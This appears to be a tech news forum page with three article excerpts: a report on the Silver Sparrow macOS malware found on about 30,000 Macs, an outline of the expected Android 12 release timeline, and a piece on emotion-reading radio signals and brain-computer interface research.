By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy

A previously undetected piece of malware found on almost 30,000 Macs worldwide is generating intrigue in security circles, and security researchers are still trying to understand precisely what it does and what purpose its self-destruct capability serves. Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe the delivery of any payload on any of the infected 30,000 machines, leaving the malware’s ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met. Also curious, the malware comes with a mechanism to completely remove itself, a capability that’s typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question of why the mechanism exists. Besides those questions, the malware is notable for a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so. The malicious binary is more mysterious still because it uses the macOS Installer JavaScript API to execute commands. That makes it hard to analyze installation package contents or the way that the package uses the JavaScript commands. The malware has been found in 153 countries with detections concentrated in the US, UK, Canada, France, and Germany. Its use of Amazon Web Services and the Akamai content delivery network ensures the command infrastructure works reliably and also makes blocking the servers harder. Researchers from Red Canary, the security firm that discovered the malware, are calling the malware Silver Sparrow. “Though we haven’t observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat, uniquely positioned to deliver a potentially impactful payload at a moment’s notice,” Red Canary researchers wrote in a blog post published on Friday. “Given these causes for concern, in the spirit of transparency, we wanted to share everything we know with the broader infosec industry sooner rather than later.” Silver Sparrow comes in two versions—one with a binary in mach-object format compiled for Intel x86_64 processors and the other Mach-O binary for the M1. So far, researchers haven’t seen either binary do much of anything, prompting the researchers to refer to them as “bystander binaries.” Curiously, when executed, the x86_64 binary displays the words “Hello World!” while the M1 binary reads “You did it!” The researchers suspect the files are placeholders to give the installer something to distribute content outside the JavaScript execution. Apple has revoked the developer certificate for both bystander binary files. Silver Sparrow is only the second piece of malware to contain code that runs natively on Apple’s new M1 chip. An adware sample reported earlier this week was the first. Native M1 code runs with greater speed and reliability on the new platform than x86_64 code does because the former doesn’t have to be translated before being executed. Many developers of legitimate macOS apps still haven’t completed the process of recompiling their code for the M1. Silver Sparrow’s M1 version suggests its developers are ahead of the curve. Once installed, Silver Sparrow searches for the URL the installer package was downloaded from, most likely so the malware operators will know which distribution channels are most successful. In that regard, Silver Sparrow resembles previously seen macOS adware. It remains unclear precisely how or where the malware is being distributed or how it gets installed. The URL check, though, suggests that malicious search results may be at least one distribution channel, in which case, the installers would likely pose as legitimate apps. For more turn to OUR FORUM.

Android is the world’s most popular smartphone operating system, running on billions of smartphones around the world. As a result, even the tiniest of changes in the OS has the potential to affect millions of users. But because of the way that Android updates are delivered, it’s debatable whether these changes actually make a difference. Despite that, we’re always looking forward to the next big Android update in hopes that it brings significant change. Speaking of which, the first developer preview for the next major update, Android 12, is right around the corner, and it can bring about many improvements. In case you missed our previous coverage, here’s everything we know about Android 12 so far. Android 12 will first make an appearance as Developer Preview releases. We expect to get a couple of these, with the first one, hopefully landing on Wednesday, 17th February 2021. The Developer Preview for Android 11 began in February 2020, a few weeks ahead of the usual release in March, which gave developers more time to adapt their apps to the new platform behaviors and APIs introduced in the update. Since the COVID-19 pandemic hasn’t completely blown over in several parts of the world, we expect Google to follow a longer timeline this year as well. As their name implies, the Android 12 Developer Previews will allow developers to begin platform migration and start the adaption process for their apps. Google is expected to detail most of the major platform changes in the previews to inform the entire Android ecosystem of what’s coming. Developer Previews are largely unstable, and they are not intended for average users. Google also reserves the right to add or remove features at this stage, so do not be surprised if you see a feature in the first Developer Preview missing in the following releases. Developer Previews are also restricted to supported Google Pixel devices, though you can try them out on other phones by sideloading a GSI. After a couple of Developer Preview releases, we will make our way to Android 12 Beta releases, with the first one expected either in May or June this year. These releases will be a bit more polished, and they will give us a fair idea of what the final OS release will look like. There may also be minor releases in between Betas, mainly to fix any critical bugs. Around this time we will also start seeing releases for devices outside of the supported Google Pixel lineup. OEMs will start migrating their UX skins to the Beta version of Android 12 and they will begin recruitments for their own “Preview” programs. However, these releases may lag a version behind the ones available on the Google Pixel. Again, bugs are to be expected in these preview programs, and as such, they are recommended only for developers and advanced users. After a beta release or two, the releases will achieve Platform Stability status co-existing alongside the Beta status. This is expected to happen around July-August this year. Platform Stability means that the Android 12 SDK, NDK APIs, app-facing surfaces, platform behaviors, and even restrictions on non-SDK interfaces have been finalized. There will be no further changes in terms of how Android 12 behaves or how APIs function in the betas that follow. At this point, developers can start updating their apps to target Android 12 (API Level 31) without being concerned about any unexpected changes breaking their app behavior. After one or two beta releases with the platform stability tag, we can expect Google to roll out the first Android 12 stable release. This is expected to happen in late-August or September. As is the case, Google’s Pixel devices are expected to be the first to get Android 12 stable releases. For non-Pixel phones, we expect to see wider public betas at this stage. The exact timeline for the same will depend upon your phone and its OEM’s plans. A good rule of thumb is that flagships will be prioritized for the update, so if you have a phone that is lower down the price range, you can expect to receive the update a few weeks or months down the line. The complete 2 part report is posted on OUR FORUM.

Our thoughts are private – or at least they were. New breakthroughs in neuroscience and artificial intelligence are changing that assumption, while at the same time inviting new questions around ethics, privacy, and the horizons of brain/computer interaction. Research published last week from Queen Mary University in London describes an application of a deep neural network that can determine a person’s emotional state by analyzing wireless signals that are used like radar. In this research, participants in the study watched a video while radio signals were sent towards them and measured when they bounced back. Analysis of body movements revealed “hidden” information about an individual’s heart and breathing rates. From these findings, the algorithm can determine one of four basic emotion types: anger, sadness, joy, and pleasure. The researchers proposed this work could help with the management of health and wellbeing and be used to perform tasks like detecting depressive states. Ahsan Noor Khan, a Ph.D. student and first author of the study, said: “We’re now looking to investigate how we could use low-cost existing systems, such as Wi-Fi routers, to detect emotions of a large number of people gathered, for instance in an office or work environment.” Among other things, this could be useful for HR departments to assess how new policies introduced in a meeting are being received, regardless of what the recipients might say. Outside of an office, police could use this technology to look for emotional changes in a crowd that might lead to violence. The research team plans to examine the public acceptance and ethical concerns around the use of this technology. Such concerns would not be surprising and conjure up a very Orwellian idea of the ‘thought police’ from 1984. In this novel, the thought police watchers are experts at reading people’s faces to ferret out beliefs unsanctioned by the state, though they never mastered learning exactly what a person was thinking. This is not the only thought technology example on the horizon with dystopian potential. In “Crocodile,” an episode of Netflix’s series Black Mirror, the show portrayed a memory-reading technique used to investigate accidents for insurance purposes. The “corroborator” device used a square node placed on a victim’s temple, then displayed their memories of an event on the screen. The investigator says the memories: “may not be totally accurate, and they’re often emotional. But by collecting a range of recollections from yourself and any witnesses, we can help build a corroborative picture.” If this seems farfetched, consider that researchers at Kyoto University in Japan developed a method to “see” inside people’s minds using an fMRI scanner, which detects changes in blood flow in the brain. Using a neural network, they correlated these with images shown to the individuals and projected the results onto a screen. Though far from polished, this was essentially a reconstruction of what they were thinking about. One prediction estimates this technology could be in use by the 2040s. Brain-computer interfaces (BCI) are making steady progress on several fronts. In 2016, research at Arizona State University showed a student wearing what looks like a swim cap that contained nearly 130 sensors connected to a computer to detect the student’s brain waves. The student is controlling the flight of three drones with his mind. The device lets him move the drones simply by thinking directional commands: up, down, left, right. Flying drones with your brain in 2019. Source: University of Southern FloridaAdvance a few years to 2019 and the headgear is far more streamlined. Now there are brain-drone races. Besides the flight examples, BCIs are being developed for medical applications. MIT researchers have developed a computer interface that can transcribe words that the user verbalizes internally but does not actually speak aloud. Visit OUR FORUM for more.